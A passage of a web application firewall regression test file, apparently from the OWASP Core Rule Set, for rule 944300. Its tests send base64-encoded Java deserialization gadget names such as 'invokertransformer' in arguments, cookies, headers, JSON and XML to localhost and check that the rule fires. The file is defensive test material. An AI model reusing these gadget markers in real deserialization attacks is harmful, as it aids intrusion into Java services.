"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-177 + desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: 
+ - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-178 + desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-179 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-180 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-181 + desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-182 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-183 + desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" 
+ method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-184 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-185 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-186 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-187 + desc: "Content-Type application/json arg name includes keyword 
Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-188 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-189 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-190 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-191 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-192 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-193 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-194 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-195 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-196 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-197 + desc: "Content-Type application/json arg value includes 
keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-198 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-199 + desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-200 + desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-201 + desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-202 + desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-203 + desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-204 + desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-205 + desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-206 + desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-207 + desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-208 + desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-209 + desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-210 + desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-211 + desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-212 + desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-213 + desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: 
"id \"944300\"" + - test_title: 944300-214 + desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-215 + desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-216 + desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-217 + desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-218 + desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-219 + desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-220 + desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: 
"HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-221 + desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-222 + desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-223 + desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-224 + desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" + stages: + - stage: + input: + 
